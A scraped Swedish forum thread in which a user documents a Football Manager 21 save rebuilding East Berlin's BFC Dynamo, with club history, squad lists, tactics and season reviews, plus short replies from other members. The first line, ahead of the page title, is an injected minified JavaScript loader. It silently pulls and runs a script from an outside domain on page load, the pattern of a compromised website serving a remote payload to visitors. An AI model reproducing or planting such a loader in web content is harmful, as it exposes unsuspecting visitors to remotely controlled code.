;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM21] Mielkes spöke – BFC Dynamos återfödelse – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[FM21] Mielkes spöke - BFC Dynamos återfödelse

20 Inlägg
6 Users
54 Reactions
1,348 Visningar
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

INTRODUKTION

7 november 1989 hände det omöjliga när Berlinmuren föll. Med dess fall störtade hela den världsordning som varit gällande sedan Andra världskriget slut samman. Under det knappa år som följde monterades hela den östtyska statsapparaten ned för att till slut helt uppgå i den Tyska förbundsrepubliken. Stasi ut, D-mark in och med det en ny vardag, inte bara för den östtyska befolkningen men också för den östtyska fotbollen och dess lag, spelare och ledare.

De östtyska klubbarna fick olika möjligheter att kvalificera sig för spel i den tidigare västtyska ligastrukturen. Baserat på sina placeringar i den östtyska ligatabellen säsongen 1990/91 flyttades lagen över till det västtyska ligasystemet. Två lag fick  varsin plats i Bundesliga, sex lag kvalificerades för spel i 2. Bundesliga medan övriga sex lag i DDR-Oberliga placerades i den regionala tredjedivisionen i det återförenade Tyskland. Med en sammanslagning, både för fotbollen och för samhället den spelades i, på Västtysklands villkor drog många östtyskar och östtyska lag nitlotter när tiden sprang ifrån det som varit en gång varit deras hem, die Deutsche Demokratische Republik. De var socialistiska institutioner oförmögna att agera i ett kapitalistiskt system.

Det lag som dominerat östtysk fotboll under den senare delen av nationens existens, Berliner Fußballclub Dynamo, var ett av lagen som inte gick någon storartad framtid till mötes. Polisklubben, eller närmare bestämt Stasi-klubben, från Berlin som styrts av den fruktade Stasi-chefen Erich Mielke bytte namn och tvingades ner i tredjedivisionen. BFC har därefter inte varit hemmahörande högre upp än i tredjeligan. Klubben har dessutom varit kraftigt bespottad, inte minst för sina historiska kopplingar men också för högerextrema och våldsbejakande kopplingar under sin tid i dem tyska gärdesgårdsserierna. Det är med andra ord en klubb med lika delar rik och intressant historia som problematisk och mörk historia. Berliner FC Dynamo, en klubb som inte bara profiterade på systemet, det var en klubb som var systemet och som efter återföreningen lagts på fotbollshistoriens soptipp. Rättmätigt menar många men samtidigt är det också ett stycke levande fotbollshistoria som försummats.

Faktum är, när allt kommer omkring, att BFC Dynamo är det lag i Tyskland med näst flest ligatitlar. FC Bayern har 31 och 1. FC Nürnberg har 9 men däremellan återfinns BFC med 10 östtyska titlar. Eftersom Berlin, en av Europas största städer, är en stad som suktar efter fotbollsframgångar och det forna DDR suktar efter fotbollsframgångar (RB Leipzig som drivs av ett multinationellt bolag är inget som kan kallas för ett före detta östtyskt lag) är tanken, i denna save, att BFC Dynamo ska återuppväckas från de döda och återigen bli en maktspelare i fotbolls-Tyskland och fotbolls-Europa. Det är det övergripande målet med saven men laget ska också präglas av en särskild sammansättning av spelare. Eftersom klubben är en tydlig symbol för det som en gång var, ska det som en gång var också genomsyra laget. Vi ska enbart försöka värva spelare från det forna Östtyskland och från de tidigare kommunistiska staterna i Europa och världen som tvingats underkasta sig ett diktatoriskt socialistiskt styre. Kanske inte den mest snäva avgränsningen men det är likväl inga av fotbollens största tungviktare som kan fogas till den skaran. Utöver det klassiska save-rapport/berättelseformatet kommer jag försöka kombinera vad som sker i spelet med anekdoter, referenser och historia från det land som en gång hette Östtyskland.

Innan denna save tar verklig fart ska jag ta tillfället i akt och poängtera att detta är ingen hyllning eller romantiserande av efterkrigstidens kommunistiska stater och dess handlingar. De flesta är säkerligen väl införstådda med det men man kan inte var nog tydlig.


   
trashbag, rockystar, Nunogomes and 3 people reacted
Citera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
 

Det här ser mycket lovande ut!

 

Ser verkligen fram emot att följa den. 🙂


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

1:0 SPARWASSER
Laget & Managern

Berliner Fussball Club Dynamo e.V. grundades 1966 i stadsdelen Lichtenberg i Östberlin när fotbollssektionen i det landsomfattande idrottsnätverket SV Dynamo bröts loss från huvudorganisationen. Tills den dagen som BFC grundades hade huvudstaden i Östtyskland inte haft något framgångsrikt lag i landets högsta serie, DDR-Oberliga. Enbart en cuptitel 1959 var allt huvudstadslaget vunnit medan det manskap som varit mest framgångsrikt i den östtyska fotbollen dittills var Dynamo Dresden. Chefen för Ministeriet för statssäkerhet, Stasi, och ordföranden i idrottsnätverket SV Dynamo Erich Mielke ansåg att landet behövde en framgångsrik fotbollsklubb från huvudstaden och därmed beordrades flera duktiga spelare från runt om i landet till Berlin och BFC Dynamo.

13 år efter grundandet landade laget sin första ligatitel när man förpassade suveränerna Dynamo Dresden till en andraplats med sju poäng till godo. De som i sin naivitet trodde att denna framgång var enbart en engångsföreteelse, en uppstickarhistoria, fick snart skäl att tänka om. BFC skulle komma att vinna ytterligare nio raka ligatitlar i rad innan de glada dagarna var till ända.

Ärligt eller inte. Rättvist eller inte. BFC Dynamo dominerade östtysk klubbfotboll på ett obarmhärtigt sätt och misstankar mot klubben saknades inte. Med en ordförande i Erich Mielke som dessutom styrde den kanske mest fruktade av dem hemliga polisorganisationerna i hela Östeuropa fanns skäl att misstänka att allt inte stod rätt till i den östtyska ligafotbollen. Likt det sovjetiska superhockeylaget CSKA samlades landets bästa spelare i BFC Dynamo, många undrade varför. Dessutom menades att BFC särbehandlades av den östtyska domarkåren, en inte helt orimlig tanke med hänsyn till organisationens särställning. Misstankarna mot laget avtog inte eftersom man år efter år misslyckades att nå långt i Europaspelet. Kvartsfinal 1980 och 1984 var det närmsta en internationell titel man kom men de gångerna blev Nottingham Forrest respektive Roma för svåra. En trevlig detalj är att BFC två gånger stötte på svenskt motstånd i det Europeiska cupspelet. 1972 slog man ut Åtvidaberg i Cupvinnarcupen och 1986 gjorde man processen kort med ÖIS i Europacupen.

Som stod att läsa i introduktionsinlägget drogs mattan undan fötterna för BFC Dynamo när den östtyska statsapparaten började krackelera och ligatiteln 1988 blev lagets sista. Efter den tyska återföreningen har lagets fall varit synonymt med kommunismens fall och efter att man åkte ur tredjedivisionen 2000 har laget inte återfunnits högre än i den tyska fyran. En serie man också befinner sig i just nu.

Jürgen Sparwasser känner de flesta som han som avgjorde den enda tävlingsmatchen mellan de två tyska nationerna i VM 1974. När klockan tickat upp till 77 spelade minuter kom ett långt inlägg som forwarden i lugnhet plockade ned och sedan dräpte upp i nättaket bakom en fullständigt chanslös Sepp Maier. Det är också han som ska träna det här laget, Jürgen Sparwasser alltså men den yngre. Född på nationens sista dag i Berlin till skillnad från Sparwasser den äldre som var född i Halberstadt. 

 

Jürgen Sparwasser d.ä. tillbringade hela sitt fotbollsliv i 1. FC Magdeburg för vilka han gjorde 111 mål innan han lade av 1979. Därtill hann han dessutom vinna Cupvinnarcupen 1974 med sitt Magdeburg när Milan besegrades på De Kuip i Rotterdam. Här kunde historien om den östtyska hjälten slutat men 1988 begick han, det som i DDR kallades Republikflucht. Han hoppade, med andra ord, av till väst i samband med en veteranmatch i Saarbrücken. I väst testade Sparwasser på några tränaruppdrag utan någon egentlig framgång.

Sparwasser d.y. då? Någon storartad spelarkarriär och avgjorde VM-matcher blev det aldrig för hans del. Inte heller behövde han fly de gånger han ville till landets västra delar. Sparwasser spelade under sin ungdom fotboll och försökte slå sig slå sig in i några av Berlins mindre klubbar. Provspel i Tennis Borussia men nej tack. Provspel i Lichtenberg, även där nej tack. Stahl Brandenburg då? Jo, där fick han plats som alternativ på mittfältet under några säsonger innan han 2016 kände att det var nog och att andra uppgifter kallade i livet. Tränaryrket, exempelvis.

Med några få säsonger som relativt framgångsrik juniortränare i ryggen kom så Sparwassers första erbjudande att träna ett seniorlag när BFC Dynamos ordförande Norbert Uhlig tog kontakt med honom. En enkel fråga för Sparwasser som inte behövde lång betänketid innan han tackade ja till Uhligs erbjudna ettårsavtal. Orutinerad ja men med en vetgirighet och vilja som få andra presenterades han, något i skymundan, den 17 augusti som BFC Dynamos, Stasi-klubbens, nye manager.


   
Denki, Micke and rockystar reacted
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Älskar användarnamnet, lycka till!

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

BLAND FOTBOLLSPLANER OCH FÖRHÖRSRUM
Sommarfönstret 2020

När Jürgen Sparwasser d.y. första gången klev in på BFC Dynamos träningsanläggning Hohenschönhausen fanns där enbart 17 spelare under kontrakt i Dynamos trupp. Det var inget mer än en halvfärdig trupp som höll till på det som en gång i tiden var Östtyskland modernaste idrottsanläggning. Dynamo-Sportforum, som det hette då, bestod inte bara av fotbollsfaciliteterna utan också av ishallar, friidrottshallar och åtta andra inomhushallar för simning, handboll, fäktning, volleyboll, ja allt som kunde tänkas för att det östtyska idrottsundret (läs statsstödda dopingprogrammet) skulle kunna fortskrida. Fanns det något mer av intresse i Hohenschönhausen när det begav sig? Ja, med tanke på att Stasi-klubben huserade i området krävs ingen större böjelse för östtysk historia för att förstå att även den hemliga polisen var inkvarterad i stadsdelen. Både högkvarteret för Stasi och dess mest ökända och fruktade fängelse var beläget i just Hohenschönhausen. Nu däremot, var anläggningarna omgjorda till muséer och idrottskomplexet det fanns kvar man var inte längre helt toppklassigt. Toppklassigt var heller inte det fotbollslag som huserade där.

Efter att ha bekantat sig med sin kollega Christof Reimann kom man överens om att särskilt centrallinjen, i den 4-4-2-uppställning man hade för avsikt att spela, var betydande svag vid den tidpunkt Sparwasser skrivit på för BFC. Klubbens skrala ekonomi till trots krävdes några nyförvärv för att kunna uppnå ordförande Nortbet Uhligs och styrelsens mål på en topp-4-placering. Eftersom det inte funnits någon ekonomisk möjlighet, hittills för klubben, att anställa någon scout lät man spelare som på pappret, på ett eller annat sätt, såg intressanta ut komma på provspel. Totalt bjöds 45 spelare in, mestadels mittbackar, centrala mittfältare och anfallare, för att testa lyckan på Hohenschönhausen. Under försäsongen kom dock en nödvändig förstärkning när 39-årige scouten Stephan Neumann valde att skriva på för oss.

Bland västar i olika färger, passningsövningar och allsköns språk utvärderades provspelarna efter en veckas träning. Av de 45 som kommit kunde en hel del avfärdas redan under veckan medan andra krävde både två och tre funderingar innan ett beslut kunde fattas. Till slut erbjöds sex spelare kontrakt, tre backar, en mittfältare och två anfallare. Fem av dessa tackade ja till BFC:s erbjudanden. 

Med de spelare som plockats in får vi så klart fler alternativ på de centrala positionerna men vi kan också utnyttja de spelare som redan finns i truppen i de roller och på de positioner de kan prestera som allra bäst. I Jan Penc och Martin Fenin får också in ytterligare rutin men också entusiasm och utvecklingsbart material i övrigt kontrakterade spelare. Även en spelare hann lämna klubben, om än bara tillfälligt.


IN:  
JAN PENC | 38 år | Mittback | 1-årsavtal | Fri transfer
“Rutinerad back som trots sin ålder ännu spänst och styrka kvar vilket gör honom till en nyckel i försvarsspelet. Har ett förflutet i tjeckiska högstaligan och kommer närmast från SK Hostivar.”

BRUNO IVIC | 21 år | Mittback | 3-årsavtal | Fri transfer
“Mittback som även kan spela på vänsterkanten. Har framtiden för sig och kommer i BFC användas i en rotationssroll för att avlasta ordinarie försvarsspelare.”

MORTIZ KRETZER | 22 år | Central mittfältare | 1-årsavtal | Fri transfer
“Mångfacetterad mittfältare som sin ringa ålder till trots redan kan användas på de flesta mittfältspositionerna. Fostrad i Jena i delstaten Thüringen. Aspirerar på en startplats redan denna säsong.

MARTIN FENIN | 33 år | Anfallare | 1-årsavtal | Fri transfer
“En gång i tiden tjeckisk landslagsman både på senior- och juniornivå och listades som en av de mest lovande ungdomarna efter U21-VM 2007. Planerad startspelare.

PASCAL SCHOCH | 21 år | Anfallare | 2-årsavtal | Fri transfer
“Berlinbördig forward som i sina tonår flyttade till Freiburg för att utvecklas till seniorspelare. Inga matcher i någon av de tre högsta serierna hittills men fortfarande utvecklingsbar. Konkurrerar främst med Fenin om den sista startplatsen i anfallet.”

UT:
 VALENTIN ZALLI | 19 år | Högerytter| Lån | FC Rot-Weiss Erfurt


   
raca14 and LeoFM reacted
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

DIE MANNSCHAFT
Truppen säsongen 2020/2021

Med truppen spikad och klar kunde Sparwasser och Reimann blicka vidare, framåt mot seriestarten men inga tävlingsmatcher kan spelas utan en truppgenomgång. Hur kommer vi att ställa upp? 3-5-1-1 med wingbacks och sittande mittfältare och inverterade anfallare? 4-2-3-1 med kreativa yttrar och offensiva ytterbackar? 4-4-3 med tokhög gegenpress? Nej, när en klassisk 4-4-2 finns att tillgå med fokus på kantspel och på att alltid ligga rätt om motståndaren väljer Sparwasser och Reimann att inte krångla till det. För att citera Sveriges förbundskapten, “Det finns vanlig ljus fatöl. IPA och sån skit, varför ska man servera det?”

Som tidigare nämnt vill vi försöka bygga laget med spelare från det gamla Östtyskland men även från övriga stater med kommunistisk historia. För att hålla koll på detta kommer vi ha ett DDR-index. 1 poäng till de spelare som är födda inom det gamla DDR:s gränser, 0,5 poäng åt de spelare som kommer från övriga stater med kommunistisk historia och 0 poäng till de som kommer från alla andra länder. Detta divideras sedan med antalet spelare i truppen för att kunna jämföra över olika säsonger.

DIE TORWARTE
Damian Schobert | 21 år | Berlin | 1
Kevin Sommer | 30 år | Berlin | 1
Kommentar: Målvaktssidan känns, på förhand, gedigen. Vi har Kevin Sommer, som tillbringat hela sin karriär i BFC, som tilltänkt etta och bakom honom skuggar Damian Schobert som kanske nästa säsong hunnit ikapp och förbi Sommer. Schobert kommer få flera chanser att visa upp sig under säsongen och kan till och med bli förstaslips redan i år.

DIE VERTEIDIGER
Michael Blum | 31 år | Düsseldorf | 0
Bruno Ivic | 21 år | Osijek | 0,5 | NY!
Marvin Kleihs | 26 år | Stendal | 1
Jan Penc | 38 år | Prag | 0,5 | NY!
Andreas Pollasch | 27 år | Berlin | 1
Chris Reher | 26 år | Dresden | 1
Jonas Zickert | 23 år | Cottbus | 1
Kommentar: Under försäsongen klev Andreas Pollasch upp och visade att han skulle ha en av de ordinarie mittbacksplatserna. En av dem som vid Sparwassers ankomst bedömdes vara en av de svagare pjäserna i centrallinjen visade att han inte var särskilt svag. Han kommer gå in som ordinarie i säsongen tillsammans med det tjeckiska nyförvärvet Penc. Bakom, att täcka upp för dessa, två finns främst Bruno Ivic och Chris Reher att tillgå. På varsin kant kommer Michael Blum och Jonas Zickert springa hörnflagga till hörnflagga och mata inlägg in mot anfallarna. Även Chris Reher finns att tillgå som ytterbacksalternativ.

DIE MITTFELDSPIELER
 Andor Bolyki | 26 år | Eger | 0,5

Joey Breitfeld | 23 år | Berlin | 1
Ronny Garubschewski | 34 år | Grimma | 1
Erolind Krasniqi | 20 år | Lübeck | 0,5
Moritz Kretzer | 22 år | Suhl | 1 | NY!
Tyson Richter | 20 år | Berlin | 1
Philip Schulz | 28 år | Berlin | 1
Will Siakam | 24 år | Douala (Kamerun) | 0
Alexander Siebeck | 26 år | Leipzig | 1
Kommentar: På mittfältet då? Veteranen Garubschewski kommer få förtroendet ute på högerkanten. Med sina 7 matcher i Bundesliga och ett otal säsonger i 3. Liga är han lagets mest rutinerade spelare tillsammans med Martin Fenin. Garubschewski är inget fysmonster längre men fina tekniska färdigheter gör honom till ett vapen offensivt. På motsatt kant hittar vi ungraren Andor Bolyki som trots att han är född i Ungern aldrig gjort en match i landet. Har sett fin ut på försäsongen. Mellan dess två herrar har vi flera alternativ men 28-årige Schulz och 20-årige Krasniqi kommer inleda säsongen på mitten. Här har vi ju dessutom nyförvärvet Kretzer som spännande alternativ.

DIE STÜRMER
Martin Fenin | 33 år | Cheb | 0,5 | NY!
Pascal Schoch | 21 år | Berlin | 1 | NY!
Matthias Steinborn | 31 år | Berlin | 1
Marcel Stutter | 32 år | Kamen | 0
Kommentar: Helgjuten i anfallet är i Matthias Steinborn. Han har gjort många säsonger för BFC med en del utflykter i andra lag i en nordöstra Regionalligan. Bredvid honom är platsen mer vakant. Tanken är att Fenin får chansen till en början men Pascal Schoch känns även han som ett hett alternativ på väg uppåt i karriären till skillnad från tjecken. Marcel Stutter kan komma att blanda sig i platsen bredvid Steinborn då det inte skiljer särskilt mycket, kunskapsmässigt, mellan Fenin, Schoch och Stutter.

DDR-INDEX 75% : : : En helt okej siffra för en trupp vi fått ärva men inte särskilt överraskande heller med tanke på vilken nivå klubben befinner sig på. Det blir naturligt att många lag är bestående av lokala spelare i Regionalligan och nedåt. Vi hoppas så klart kunna höja denna siffra vid framtida lagbyggen!


   
rockystar reacted
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

OKTOBERREVOLUTIONEN 2020
Första delen av säsongen 2020/2021

REGIONALLIGA NORDOST : : : Innan första avspark i den Nordöstra Regionalligan skulle vi kliva in i Berlins distriktsmästerskap. Uppgiften som bestod i Wilmersdorf, från längre ner i seriesystemet, togs hand om och städades bort med enkla 2-1 efter mål av yttermittfältarna Andor Bolyki och Ronny Garbuschewski. Därefter var det dags att kliva in i säsongen 2020/2021 på allvar och i premiären väntade, den på förhand och enligt experterna svåraste uppgiften i Nordöstra Regionalligan, nydegraderade Energie Cottbus.

0-1-förlust i premiären mot Cottbus efter stora svårigheter att få till ett ordentligt anfallsspel och sedan oavgjort i den efterföljande matchen mot Halberstadt gav oss ingen flygande start på säsongen men det skulle komma en vändning och det snabbt. Oktober blir, för oss, så nära det går att komma en perfekt månad. Vi går fram som en sovjetisk pansarvagn med 13 mål framåt och bara två insläppta på totalt sex kamper. Riktigt bra papper! Visserligen spelar vi mot relativt svagt motstånd men kan, i och med resultaten, haka på Auerbach och Meuselwitz i tabelltoppen.

När vi sedan kliver in i november väntar också ovan nämnda topplag, ZFC Meuselwitz och VfB Auerbach. Tyvärr kommer vi inte i närheten av vår högstanivå i matchen mot Meuselwitz och när vi sedan ställs mot Auerbach tappar vi den poäng vi har i handen när de tilldöms en straff i matchens 81:a minut. Därifrån kan vi inte hämtas oss och vi följer dessutom upp med en förlust mot Jena i matchen efter. November, inte riktigt vår månad.

Fortsättningen på säsongens första del går både upp och ner. Den, hittills, bästa insatsen för säsongen när Chemnitz brottas ner med 1-0 följs upp av ett riktigt bottennapp mot Fürstenwalde och det är lite signifikativt för BFC:s 2020. Vi är ett klassiskt varannadagslag som inte riktigt lyckas få ordentligt bett på topplagen men heller inte tappar tillräckligt med poäng för tvingas ner på mittenplaceringarna. Betygsmässigt får vi lov att inställa oss kring ett ‘Okej’ med eventuellt plus i kanten. Vi saknar alltjämt jämnheten i vårt offensiva spel och det bidrar till att vi kan tappa poäng när våra anfallare inte har dagen.

Spoiler
TABELL FÖRSTA HALVAN SÄSONGEN 2020/2021
 


AKTUELLE KAMERA

I DDR fanns nyhetsprogrammet ‘Aktuelle Kamera’. Ett program som hade sin svenska motsvarighet i Rapport eller Aktuellt. Vid varje säsongsuppdatering kommer vi köra vårt eget Aktuelle Kamera där vi lyfter fram det mest centrala som hänt under säsongens gång.

DIE MANNASCHAFT : : : Frågetecknen inför säsongen då, hur har de besvarats? Vilka leder anfallet? Vem vaktar målet? Klarar Garbuschewski att hänga med i tempot?

I truppgenomgången nämndes att Steinborn skulle starta tillsammans med Martin Fenin men den planen kom på skam när Fenin ådrog sig en lättare knäskada dagen innan premiären och blev borta i tre veckor. In i premiärelvan i hans ställe kom Marcel Stutter och det är främst den 32-årige tysken som har kamperat bredvid Steinborn. Fem mål från Stutters fot hittills men på intet sätt någon övertygande matchvinnare tillsammans med Steinborn har givit tillfällen både för Pascal Schoch och Martin Fenin att spela utan att heller någon av dem visat att de är ordinarie i startelvan. Med andra ord, det offensiva frågetecknet kvarstår och är snarare ännu starkare nu än tvärtom.

Längst bak då? Sommer eller Schobert? Vi inledde som sagt med Kevin Sommer som sista utpost men efter att Damian Schobert uttryckt sitt missnöje med situationen fick en pressad Jürgen Sparwasser ge efter och ge Schobert chansen. Om han tog den? Som han tog den. Schobert har sedan 2-1-segern mot Lokomotiv Leipzig varit lagets kanske bäste spelare trots att vi inkasserat fler förluster med honom i mål än med Sommer men förlusterna mot Meuselwitz, Auerbach och Jena hade knappast kunnat undvikas om Sommer spelat istället för Schobert.

Trots att frågetecknet längst bak i planen rätats ut har den situation som Schobert försatte klubben i med sitt missnöje dessvärre varit ett genomgående tema denna första delen av säsongen. Förutom Damian Schobert har Will Siakam, Bruno Ivic, Alexander Siebeck och Marvin Kleihs uttryckt missnöje med den speltid de har tilldelats. Med sistnämnde Kleihs, som var långt från startelvan, blev situationen så pass ohållbar att han gick med på att sparka sig själv från laget den 18 november utan någon som helst ersättning. Missnöjet har därefter, bland en del spelare i gruppen, lättat och vi hoppas på att ha situationen under kontroll inom kort.

Om Garbuschewski hänger med i tempot, svar JA. Tillsammans med Schobert har han varit lagets klarast lysande stjärna med åtta fullträffar, lika många framspelningar och ett snittbetyg på 7,25. Tack vare detta spelade han till sig ett nytt treårsavtal som undertecknades i mitten av oktober och kommer således vara Dynamospelare fram till sista juni 2023. Han kommer då vara 37 år fyllda och vi kan komma att få ångra det relativt långa kontraktet men för tillfället stormnjuter vi av hans insatser.

DIE RECHENSCHAFT : : : Slutligen har vi en kontroversiell nyhet att förmedla. Eftersom klubbens ekonomi är lika genomusel som den östtyska statens var vid ‘Die Wende’ såg vi i ledningen ett behov av att både öka våra intäkter men också möjligheten att kunna nyttja bra spelare till lägre summor. Vi gick därför till styrelsen och bad dem leta efter en huvudklubb och som de levererade när de lade fram sina tre förslag… På bordet låg Mainz 05, Borussia Dortmund och FC Bayern. Om Mainz är ett jättebra förslag räcker orden knappt till att beskriva Dortmund och FC Bayern men lika bra som förslagen var, lika svåra var de att förena med Stasi-klubben som byggt sin identitet i skarp kontrast med just jättarna från gamla väst. Detta till trots är Borussia Dortmund och FC Bayern för bra samarbetsalternativ att säga nej till. Med devisen “ha dina vänner men dina fiender närmare” i bakhuvudet fick ordförande Norbert Uhlig ändå lov att underteckna avtalet med FC Bayern. En fantastisk möjlighet för BFC Dynamo med Tysklands två mest framgångsrika klubblag i tätt samarbete.


   
LeoFM reacted
SvaraCitera
Jimpacool
(@jimpacool)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Fan vad fint!


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

UNENTSCHIEDEN
Andra delen av säsongen 2020/2021

REGIONALLIGA NORDOST : : : Unentschieden! Oavgjort… Världsmästare i att spela oavgjort. Som rapporterades i summeringen av första halvan av säsongen 2020/2021 började formen vackla efter nyårsskiftet och istället för att rada upp segrar kom vi att rada upp oavgjort efter oavgjort resultat. Dåligt? Ja. Tråkigt? Ja. Men, framförallt, frustrerande.

Andra delen av säsongen inleds med spel i distriktsmästerskapet, återigen. I turneringen som styrelsen menar att vi bör ta oss till final i, får vi möta Altglienicke i kvartsfinalen och det är ett lag som stått sig ungefär lika väl som oss i seriespelet hittills. I kvartsfinalen visar Altglienicke att de för tillfället är bättre än oss och bärgar segern med klara 2-0. Februari fortsätter sedan att präglas av undermåliga insatser, fyra av fem seriematcher slutar oavgjort och de dagar som defensiven klickar räddas vi av offensiven och de dagar som offensiven klickar räddas vi av en ramstark defensiv. Vi kan vara nöjda med att inte förlora men det är extremt frustrerande att aldrig kunna peta in någon segerboll.

Mars, april och maj fortsätter alla på liknande sätt, vi vinner mot lag på tabellens undre halva, förlorar mot lagen omkring oss i toppen och kryssar fram mot lagen i tabellens mitt. Det är en jobbig period för oss formmässigt och i försök att råda bot på den sviktande formen ändrar vi lite i formationen. Försöket med en 3-5-2-uppställning resulterar inte i någon omedelbar förbättring. Vinster blandas friskt med förluster och oavgjorda matcher. Vad ska vi ta oss till nu? Den topp fyra-placering som styrelsen har som krav på mig och laget är på väg att glida oss ur handen. Vi är till och med ner och hovrar på en åttondeplacering i en mycket jämn tabell.

Vi går tillbaka till grunderna. 4-4-2. Resultat? Ingen förbättring och nu börjar frustrationen bli påtaglig både i styrelserum, ledarrum och omklädningsrum. I ett sista desperat försök att haka på i toppen justerar vi taktiken återigen, nu ska vi försöka spela 4-2-3-1 med gegenpress och offensiva ytterbackar á la Jürgen Klopp. Det spelsystem som vi tydligt påstod att vi inte skulle spela i truppgenomgången ska vi nu försöka bemästra. Låter som upplagt för fiasko för ett stelbent DDR-lag, men. Men, men, men… Nu börjar någonting äntligen hända! Istället för att lämna över kommandot tar vi kommandot i matcherna och när spelarna börjar prestera allt bättre och ett par resultat går vår väg tinar också styrelsen. Det slutar med att de är riktigt nöjda med vårt sätt att spela på planen fastän vi inte lyckas lösa en topp fyra-placering i och med två oavgjorda matcher i de två sista omgångarna.

Spoiler
TABELL ANDRA HALVAN SÄSONGEN 2020/2021

AKTUELLE KAMERA

DIE MANNSCHAFT : : : I och med sviktande form och kollektivt svaga insatser under vårsäsongen var det heller ingen spelarpresentation som stack ut mer än någon annan. Alexander Siebeck på vänsterkanten gjorde en del bra insatser vilket vi ju var inne på tidigare. Steinborn, vår bäste anfallare, blandade och gav och likaså Schobert i mål. Mindre smickrande insatser då? Offensivt hade både Martin Fenin och Marcel Stutter det svårt att sätta bollen i nät, allt som oftast lämnade de planen mållösa. En annan spelare som inte motsvarat förväntningarna eller storleken på hans lönecheck är ungraren Andor Bolyki. Två mål och fyra assist är långt ifrån godkänt.

Överlag dem dystra rubrikerna under våren till trots kan vi, med det trendbrott vi såg i och med övergången till 4-2-3-1-spelet, se fram emot nästkommande säsong med tillförsikt. Men inte bara därför. Vi nämnde i föregående rapport att delar av spelartruppen var missnöjda med den speltid de lovats av den tidigare ledningen. Både Damian Schobert och Alexander Siebeck kom med tiden att släppa sin oro eftersom de fick spela mer och även gjorde det bra. Det enda bakslaget på denna front kom att bli Bruno Ivic och Will Siakam, två mindre betydelsefulla spelare, som ansåg att de gjort sig rätt till större speltid än vad de fick men utan att få gehör hos någon i tränarteamet.

Vad som var desto tyngre var att Ronny Garbuschewski, som vi lovat förbättra anfallet, inte alls blev nöjd med Kai Druschky som vi plockat in i det avseendet. Så pass missnöjd blev han, att han inte längre ville vara en del av laget. Tungt besked givetvis men med tiden och ju längre säsongen lidit desto färre har Garbuschewski topprestationer blivit och desto sämre har klubbens ekonomi blivit. Klubbens ekonomi är något vi kommer komma in mer på i en senare uppdatering. Med en åldrande och relativt välbetald Ronny Garbuschewski känns hans missnöje och drömmar bort från klubben därmed nästan närmare en tillgång än en belastning.

Förutom Kai Druscky in i laget förstärktes vårt lilla övergångsteam med den belgiske scouten Mbo Mpenza. Inte den Émile Mpenza som sänkte Sverige i EM 2000 men väl hans bror. Att Mpenza valde att skriva på för oss va en lyckoträff eftersom Stephan Neumann fick ett erbjudande från Würzburg Kickers som han inte kunde tacka nej till.


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

DEM GELD SIND AUS
Säsongsavslutning

SPELARPRESTATIONER : : : Då var alltså klubblagssäsongen 2020/2021 till ända, kvar var bara EM-slutspelet och vi väljer därför att sammanfatta säsongen som gått. Vad tar vi med oss? Jo, vi tar självfallet med oss den höst vi genomförde där vi inkasserade flera vinster men vi tar också med oss den framgångsrika övergången till 4-2-3-1-formationen som höjde vårt spel flera nivåer. Vad som vi dessvärre också måste bära med oss in i framtiden är den usla ekonomiska situation vi befinner oss i. Just den är så pass påtaglig att vi återkommer senare i inlägget.

Spelmässigt då, vilka var bäst och vem motsvarade inte förväntningarna?

DAMIAN SCHOBERT : : : Bäst i laget, överlag under säsongen, är framtidsnamnet och målvakten Schobert. I åtanke ska has, det var sällan på grund av defensiven som vi förlorade matcher och en bytande del i den bedriften var Schobert. Vi kan vara väldigt nöjda med att Schobert valt att skriva ett nytt kontakt med oss som sträcker sig till juni 2024.

RONNY GARBUSCHEWSKI : : : Trots att han mattades ju längre säsongen led och trots att han hamnade i fejd med tränarstaben är det svårt att blunda för Garbuschweskis höst. 10 mål och 14 assist under säsongen och 7,15 i snittbetyg är imponerande men också det sista han gör i BFC:s tröja innan han flyttar vidare i sin fotbollskarriär trots sitt förlängda avtal.

ANDREAS POLLASCH : : : Lagkaptenen Pollasch får hållas som lagets tredje bäste spelare under 2020/2021. Alltid pålitlig och jobbet i det tysta är hans tydliga signum. Tyvärr har vi sett det sista även av vår lagkapten i den vinröda dräkten eftersom hans löneanspråk inte kan tillgodoses i och med en ekonomiska situation klubben befinner sig i.

ANDOR BOLYKI : : : Den gyllene soptunnan, den tilldelas ungraren Andor Bolyki. Ungraren var under långa stunder av säsongen fullkomligt osynlig. Sämst kanske han inte har varit men han gjorde aldrig skäl för det lönekuvert han mottog i slutet av varje månad. Säkerligen en skicklig fotbollsspelare men inte hos oss. Vi tackar Andor för sin tid i klubben.

